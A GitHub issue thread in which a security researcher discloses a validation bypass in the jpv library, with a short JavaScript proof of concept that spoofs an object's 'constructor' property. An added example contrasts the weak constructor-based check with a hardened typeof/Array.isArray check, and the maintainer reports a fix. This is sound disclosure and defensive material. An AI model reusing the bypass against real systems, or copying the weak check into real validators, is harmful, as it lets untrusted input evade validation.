Validation Bypass #10

Closed
Garrestocles opened this issue Aug 6, 2020 · 3 comments

Comments

@Garrestocles

Hello,

I'm a security researcher at Sonatype, and I discovered a potential vulnerability in this project. Do you have a preferred way for me to share the details privately, or do you want me to just show you what I've got on this GitHub issue?

@manvel-khnkoyan
Owner

Please, could you share it here?
Thanks

@Garrestocles
Author

I was looking at issue #6, and it seems like we can still bypass the provided fix. In the line where it's checking if the constructors match, it's still possible to just set the constructor of the data we're trying to get validated to mock whatever it's supposed to be.

Here's a Proof of Concept:

```js
const jpv = require('jpv');

const someJson = {
  definitelyAnArray: {
    sneakyStuff: "Don't tell anyone, but I'm not actually an array.",
    constructor: [].constructor
  }
};
const schema = {
  definitelyAnArray: []
};

// jpv.validate(someJson, schema) should return false, but, as of 2.2.1, returns true
console.log("Validation is getting bypassed: " + jpv.validate(someJson, schema));
```
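
The bypass described in the comment above, reduced to the type check itself, as an added example that is not part of the issue thread and is not jpv's source. `constructorMatches` is a hypothetical model of a constructor comparison; `typeTag`, `typeMatches` and `validateShape` are hypothetical names for a hardened alternative that asks the engine for the type instead of reading a property the input controls.

```javascript
// Added example: a simplified model of a constructor-based check (not jpv's source).

// Weak: trusts `constructor`, a property the validated input can define itself.
function constructorMatches(value, pattern) {
  return value !== null && value !== undefined &&
    value.constructor === pattern.constructor;
}

// Hardened: ask the engine. typeof and Array.isArray ignore own properties.
function typeTag(value) {
  if (value === null) return 'null';
  if (Array.isArray(value)) return 'array';
  return typeof value;
}

function typeMatches(value, pattern) {
  return typeTag(value) === typeTag(pattern);
}

// Hypothetical minimal validator: every schema key must exist on the data
// with the same type; nested plain objects are checked recursively.
function validateShape(data, schema, sameType) {
  return Object.keys(schema).every((key) => {
    if (!Object.prototype.hasOwnProperty.call(data, key)) return false;
    if (!sameType(data[key], schema[key])) return false;
    return typeTag(schema[key]) !== 'object' ||
      validateShape(data[key], schema[key], sameType);
  });
}

// Constructed inputs: the PoC's shape, a nested variant, and an honest document.
const arraySchema = { definitelyAnArray: [] };
const spoofed = { definitelyAnArray: { sneakyStuff: 'x', constructor: [].constructor } };
const nestedSchema = { user: { tags: [] } };
const nestedSpoofed = { user: { tags: { constructor: Array } } };
const honest = { definitelyAnArray: [1, 2, 3] };

console.log('weak check, spoofed input:    ', validateShape(spoofed, arraySchema, constructorMatches));
console.log('hardened check, spoofed input:', validateShape(spoofed, arraySchema, typeMatches));
console.log('hardened check, nested spoof: ', validateShape(nestedSpoofed, nestedSchema, typeMatches));
console.log('hardened check, honest input: ', validateShape(honest, arraySchema, typeMatches));
```
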

manvel-khnkoyan pushed a commit that referenced this issue Aug 8, 2020
@manvel-khnkoyan
Owner

The issue was fixed #10
